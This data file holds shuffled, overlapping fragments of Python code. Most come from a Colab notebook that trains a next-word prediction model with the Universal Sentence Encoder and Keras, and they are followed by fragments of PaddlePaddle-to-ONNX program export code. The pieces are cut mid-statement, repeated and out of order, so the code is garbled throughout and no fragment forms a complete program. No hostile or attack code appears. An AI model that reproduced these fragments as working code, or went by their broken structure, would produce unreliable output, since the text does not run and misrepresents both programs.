'\\nNEXT WORD: ' + item.split(' ')[-1] +", "= embed(X_train) X_test = embed(X_test) X_train = X_train.numpy() X_test = X_test.numpy() # PREVIEW", "learning _common terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary) model.save('./NWP-USE')", "smooth evaluation of the model, that the **Current User** may be less fatigued", "Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output", "import os import re import gdown import numpy import string import numpy as", "google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" # Getting all required", "take a while but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate =", "-*- \"\"\"Next-Word Prediction using Universal Sentence Encoder.ipynb Automatically generated by Colaboratory. Original file", "as tf from absl import logging import tensorflow_hub as hub from tensorflow import", "y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train) #", "Prediction using Universal Sentence Encoder.ipynb Automatically generated by Colaboratory. Original file is located", "drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output =", "# Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1", "# Import the Universal Sentence Encoder's TF Hub module (Here we're making use", "be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier", "to further scrutinize. \"\"\" # Commented out IPython magic to ensure Python compatibility.", "= 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the", "**Current User** may be less fatigued and see beauty in the good work._", ":: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import", "for item in collection: text = item for i in range(extent): prediction =", "'.join(lines).replace('\\n','').split(' '))) primary_store = {} for strings, texts in enumerate(vocabulary): primary_store[texts] = strings", "Python compatibility. # This cell will prompt an external url to accept permissions", "= X_train.numpy() X_test = X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10])", "required libraries import os import re import gdown import numpy import string import", "from absl import logging import tensorflow_hub as hub from tensorflow import keras import", "libraries import os import re import gdown import numpy import string import numpy", "' + item + '\\nNEXT WORD: ' + item.split(' ')[-1] + '\\n') #", "+= ' ' + vocabulary[idx] print(text + ' --> ' + item +", "# Splitting data into Train sets and test sets X = [] y", "use of version 4) # This will take a while but won't be", "'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset is based on", "output def next_word(collection=[], extent=1): for item in collection: text = item for i", "doc in cache] # Switch to lower case # PREVIEW OUTPUT :: #", "model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += ' ' + vocabulary[idx] print(text + '", "vocabulary = list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store = {} for strings, texts in enumerate(vocabulary):", "input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() #", "# Create function to predict and show detailed output def next_word(collection=[], extent=1): for", "# Switch to lower case # PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines)", "%ls \"\"\"# **Import ***\"\"\" # Getting all required libraries import os import re", "test sets X = [] y = [] for c in lines: xxxx", "module (Here we're making use of version 4) # This will take a", "# print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential() #", "from directory with open('corpus.txt') as subject: cache = subject.readlines() translator = str.maketrans('', '',", "OUTPUT :: # print(lines[0][:100]) # len(lines) # Generate an list of single/independent words", "text = item for i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1])", "to predict and show detailed output def next_word(collection=[], extent=1): for item in collection:", "output_dim=100)) model = Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary),", "[0 for i in range(len(vocabulary))] # Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]]", "DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output,", "Testing on a collection of words text_collection = ['deep convolutional', 'simple and effective',", "\"\"\"## **Data preparation - _Generating Corpus_**\"\"\" # Download data from Google drive '''", "# appreciate.variables # Wrapping up with the U-S-E X_train = embed(X_train) X_test =", "import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from keras.layers import", "directory with open('corpus.txt') as subject: cache = subject.readlines() translator = str.maketrans('', '', string.punctuation)", "print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal Sentence Encoder's TF Hub", "Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding", "***\"\"\" # Getting all required libraries import os import re import gdown import", "Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\" # Download", "\"\"\"## **Embeddings!**\"\"\" # Import the Universal Sentence Encoder's TF Hub module (Here we're", "words will be based on Deep learning and Machine learning _common terms_. \"\"\"", "X_train.numpy() X_test = X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) #", "WORD: ' + item.split(' ')[-1] + '\\n') # Tests - please feel free", "train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\" # Download data from Google drive", "range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += ' ' + vocabulary[idx]", "based on Deep learning and Machine learning _common terms_. \"\"\" # Storing data", "out IPython magic to ensure Python compatibility. # This cell will prompt an", "model = Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation", "= [doc.lower().translate(translator) for doc in cache] # Switch to lower case # PREVIEW", "predict and show detailed output def next_word(collection=[], extent=1): for item in collection: text", "a Tensorflow tutorial from Stanford, so all predicted words will be based on", "# Tests - please feel free to explore single_text = ['and some other", "'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40 # Read local file from", "https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40 # Read", "callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to predict and show detailed output", "are written to facilitate smooth evaluation of the model, that the **Current User**", "the **Current User** may be less fatigued and see beauty in the good", "{} for strings, texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT ::", "4) # This will take a while but won't be long :) module_url", "good work._ Uncomment text under **PREVIEW OUTPUT** to further scrutinize. \"\"\" # Commented", "activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the model. model.fit(X_train, y_train,", "Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from keras.layers import Dense,", "re import gdown import numpy import string import numpy as np import pandas", "preparation - _Generating Corpus_**\"\"\" # Download data from Google drive ''' ORIGINAL DATASET", "on a collection of words text_collection = ['deep convolutional', 'simple and effective', 'a", "# print(lines[0][:100]) # len(lines) # Generate an list of single/independent words vocabulary =", "def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables # Wrapping up", "= hub.load(module_url) # Making it easier - Function for embedding def embed(goodness): return", "Sentence Encoder's TF Hub module (Here we're making use of version 4) #", "input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])", "\"\"\"## **For the record** The Dataset is based on a Tensorflow tutorial from", "print(vocabulary[:50]) # len(vocabulary) # Splitting data into Train sets and test sets X", "collection: text = item for i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx =", "in cache] # Switch to lower case # PREVIEW OUTPUT :: # print(lines[0][:100])", "OUTPUT :: # appreciate.variables # Wrapping up with the U-S-E X_train = embed(X_train)", "absl import logging import tensorflow_hub as hub from tensorflow import keras import matplotlib.pyplot", "'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset", "# model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy',", "drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" # Getting all required libraries import os", "corpus yyyy = [0 for i in range(len(vocabulary))] # Generate Y from the", ":: # appreciate.variables # Wrapping up with the U-S-E X_train = embed(X_train) X_test", "tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from keras.layers import Dense, Activation from", "# Commented out IPython magic to ensure Python compatibility. # This cell will", "# -*- coding: utf-8 -*- \"\"\"Next-Word Prediction using Universal Sentence Encoder.ipynb Automatically generated", "fatigued and see beauty in the good work._ Uncomment text under **PREVIEW OUTPUT**", "# PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) #", "of version 4) # This will take a while but won't be long", "further scrutinize. \"\"\" # Commented out IPython magic to ensure Python compatibility. #", "model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20,", "import LSTM from keras.layers import Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils", "model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create", "= ['and some other essential'] next_word(single_text) # Testing on a collection of words", "= 40 # Read local file from directory with open('corpus.txt') as subject: cache", "text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For", "# Read local file from directory with open('corpus.txt') as subject: cache = subject.readlines()", "as subject: cache = subject.readlines() translator = str.maketrans('', '', string.punctuation) # Remove punctuation", "the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\"", "for c in lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from", "Hub module (Here we're making use of version 4) # This will take", "xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy =", "from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW'", "Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage** _NB:", "with the U-S-E X_train = embed(X_train) X_test = embed(X_test) X_train = X_train.numpy() X_test", "# Making it easier - Function for embedding def embed(goodness): return appreciate(goodness) #", "os import re import gdown import numpy import string import numpy as np", "Wrapping up with the U-S-E X_train = embed(X_train) X_test = embed(X_test) X_train =", "_common terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary) model.save('./NWP-USE') ##", "for embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables #", "feel free to explore single_text = ['and some other essential'] next_word(single_text) # Testing", "# Getting all required libraries import os import re import gdown import numpy", "ensure Python compatibility. # This cell will prompt an external url to accept", "= 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X, y,", "= train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW", "= item for i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item", "to ensure Python compatibility. # This cell will prompt an external url to", "Corpus_**\"\"\" # Download data from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt '''", "it easier - Function for embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT", "all required libraries import os import re import gdown import numpy import string", "= Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation =", "\"\"\"#**Unto the tests!**\"\"\" # Create function to predict and show detailed output def", "Commented out IPython magic to ensure Python compatibility. # This cell will prompt", "embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables # Wrapping up with", "item += ' ' + vocabulary[idx] print(text + ' --> ' + item", "in the good work._ Uncomment text under **PREVIEW OUTPUT** to further scrutinize. \"\"\"", "gdown import numpy import string import numpy as np import pandas as pd", "keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\"", ":) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier - Function", "lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy", "# print(vocabulary[:50]) # len(vocabulary) # Splitting data into Train sets and test sets", "= numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10])", "string import numpy as np import pandas as pd import seaborn as sns", "model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary()", "as pd import seaborn as sns import tensorflow as tf from absl import", "from keras.layers import Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file", "effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset is based", "# print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model =", "model.summary() # Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()])", "matplotlib.pyplot as plt from keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent", "' + item.split(' ')[-1] + '\\n') # Tests - please feel free to", "get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation -", "is based on a Tensorflow tutorial from Stanford, so all predicted words will", "as np import pandas as pd import seaborn as sns import tensorflow as", "print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the", "plt from keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM", "accept permissions for Colab to access Google Drive from google.colab import drive drive.mount(\"/gdrive\")", "[] y = [] for c in lines: xxxx = c.replace('\\n','').split(' ') X.append('", "for i in range(len(vocabulary))] # Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] =", "# Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto", "' + vocabulary[idx] print(text + ' --> ' + item + '\\nNEXT WORD:", "keras.layers import Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file from", "data from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = '", "at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage** _NB: All comments are written", "facilitate smooth evaluation of the model, that the **Current User** may be less", "epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to predict and", "item for i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item +=", "model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" #", "1 y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test =", "**Embeddings!**\"\"\" # Import the Universal Sentence Encoder's TF Hub module (Here we're making", "Remove punctuation lines = [doc.lower().translate(translator) for doc in cache] # Switch to lower", "OUTPUT** to further scrutinize. \"\"\" # Commented out IPython magic to ensure Python", "# X from the corpus yyyy = [0 for i in range(len(vocabulary))] #", "return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables # Wrapping up with the", "np import pandas as pd import seaborn as sns import tensorflow as tf", "- Function for embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: #", "from the corpus yyyy = [0 for i in range(len(vocabulary))] # Generate Y", "print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal", "file from directory with open('corpus.txt') as subject: cache = subject.readlines() translator = str.maketrans('',", "['deep convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record**", "import matplotlib.pyplot as plt from keras.models import Sequential import tensorflow.keras.backend as K from", "beauty in the good work._ Uncomment text under **PREVIEW OUTPUT** to further scrutinize.", "= str.maketrans('', '', string.punctuation) # Remove punctuation lines = [doc.lower().translate(translator) for doc in", "shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to predict", "Splitting data into Train sets and test sets X = [] y =", "import train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\" # Download data from Google", "- _Generating Corpus_**\"\"\" # Download data from Google drive ''' ORIGINAL DATASET URL:", "essential'] next_word(single_text) # Testing on a collection of words text_collection = ['deep convolutional',", "print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model", "**For the record** The Dataset is based on a Tensorflow tutorial from Stanford,", "next_word(collection=[], extent=1): for item in collection: text = item for i in range(extent):", "as hub from tensorflow import keras import matplotlib.pyplot as plt from keras.models import", "but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making", "URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False)", "'))) primary_store = {} for strings, texts in enumerate(vocabulary): primary_store[texts] = strings #", "# Remove punctuation lines = [doc.lower().translate(translator) for doc in cache] # Switch to", "written to facilitate smooth evaluation of the model, that the **Current User** may", "**Import ***\"\"\" # Getting all required libraries import os import re import gdown", "primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) # Splitting", "X_train = embed(X_train) X_test = embed(X_test) X_train = X_train.numpy() X_test = X_test.numpy() #", "# sentence_length = 40 # Read local file from directory with open('corpus.txt') as", "# PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines) # Generate an list of", "# This will take a while but won't be long :) module_url =", "y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) #", "range(len(vocabulary))] # Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] =", "words vocabulary = list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store = {} for strings, texts in", "in range(len(vocabulary))] # Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]]", "= [] for c in lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) #", "see beauty in the good work._ Uncomment text under **PREVIEW OUTPUT** to further", "logging import tensorflow_hub as hub from tensorflow import keras import matplotlib.pyplot as plt", "a collection of words text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex',", "appreciate.variables # Wrapping up with the U-S-E X_train = embed(X_train) X_test = embed(X_test)", "IPython magic to ensure Python compatibility. # This cell will prompt an external", "extent=1): for item in collection: text = item for i in range(extent): prediction", "model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam',", "string.punctuation) # Remove punctuation lines = [doc.lower().translate(translator) for doc in cache] # Switch", "please feel free to explore single_text = ['and some other essential'] next_word(single_text) #", "[doc.lower().translate(translator) for doc in cache] # Switch to lower case # PREVIEW OUTPUT", "pd import seaborn as sns import tensorflow as tf from absl import logging", "Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax'))", "= 1 y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test", "PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) # Splitting data into Train sets", "detailed output def next_word(collection=[], extent=1): for item in collection: text = item for", "# REVIEW OUTPUT :: # appreciate.variables # Wrapping up with the U-S-E X_train", "function to predict and show detailed output def next_word(collection=[], extent=1): for item in", "import logging import tensorflow_hub as hub from tensorflow import keras import matplotlib.pyplot as", "from keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding from", "**Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() #", "while but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) #", "external url to accept permissions for Colab to access Google Drive from google.colab", "import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\" #", "print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal Sentence Encoder's TF Hub module (Here", "from sklearn.model_selection import train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\" # Download data", "on Deep learning and Machine learning _common terms_. \"\"\" # Storing data vocabulary", "Stanford, so all predicted words will be based on Deep learning and Machine", "storage** _NB: All comments are written to facilitate smooth evaluation of the model,", "from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation - _Generating", "Drive from google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" # Getting", "(Here we're making use of version 4) # This will take a while", "and show detailed output def next_word(collection=[], extent=1): for item in collection: text =", "'\\nNEXT WORD: ' + item.split(' ')[-1] + '\\n') # Tests - please feel", "Train sets and test sets X = [] y = [] for c", "in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += ' ' +", "Universal Sentence Encoder.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL", "**PREVIEW OUTPUT** to further scrutinize. \"\"\" # Commented out IPython magic to ensure", "in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary)", "X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100))", "= 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40 # Read local file", "print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary)," ]
[ "if input_spec is incomplete, declarative will throw error # inner_input_spec is list[InputSpec], it", "type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer", "saved, the input 'input_spec' should be None, but received the type of 'input_spec'", "in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var in target_vars]", "KIND, either express or implied. # See the License for the specific language", "= [ var.name for var in flatten(inputs) if isinstance(var, Variable) ] if input_spec", "Unless required by applicable law or agreed to in writing, software # distributed", "not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\"", "Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\" #", "name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they", "= uniq_target_vars target_var_name_list = [var.name for var in target_vars] origin_program = main_program.clone() main_program", "attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func:", "code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)):", "and # limitations under the License. from __future__ import absolute_import import os import", "flatten(inputs) if isinstance(var, Variable) ] if input_spec is None: # no prune return", "in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune", "if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec:", "main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program) return", "Get input variables name ]. For output var, # we only support VarBase", "= [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or", "# no prune result_list = input_var_names # if input spec name not in", "input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else:", "# TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types)", "target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\") main_program = _get_valid_program(main_program) #", "need to be saved, the input 'input_spec' should be None, but received the", "uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var in target_vars] origin_program =", "None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If there are", "using jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \"", "this file except in compliance with the License. # You may obtain a", "does not exists. \" \\ \"Please make sure the name of InputSpec or", "VarBase spec, and actually, we only need the # var name of output,", "\"When using jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[])", "isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in", "transform in jit.save, if input_spec is incomplete, declarative will throw error # inner_input_spec", "var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator", "target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var", "zeros before saving inference model\" ) break with program_guard(main_program): uniq_target_vars = [] for", "attr_func: raise ValueError( \"If there are static functions other than 'forward' that need", "Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import", "spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no", "result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not", "None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: #", "the name of InputSpec or example Tensor \" \\ \"in input_spec is the", "main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars] for target_v in target_vars: if", "input_var_names # if input spec name not in input_var_names, only raise warning for", "is None: warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name)", "from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error", "output_vars_dict = OrderedDict() for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var", "out non-tensor type spec infos. input_spec = [ spec for spec in input_spec", "the input 'input_spec' should be None, but received the type of 'input_spec' is", "raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" ) if", "like [ Get input variables name ]. For output var, # we only", "if the program contains auc op all_ops = main_program.global_block().ops for op in all_ops:", "% spec.name) else: # do nothing pass else: # prune for spec in", "we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names", "op.type == 'auc': warnings.warn( \"please ensure that you have set the auc states", ") break with program_guard(main_program): uniq_target_vars = [] for i, var in enumerate(target_vars): uniq_target_vars.append(var)", "enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index", "op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: 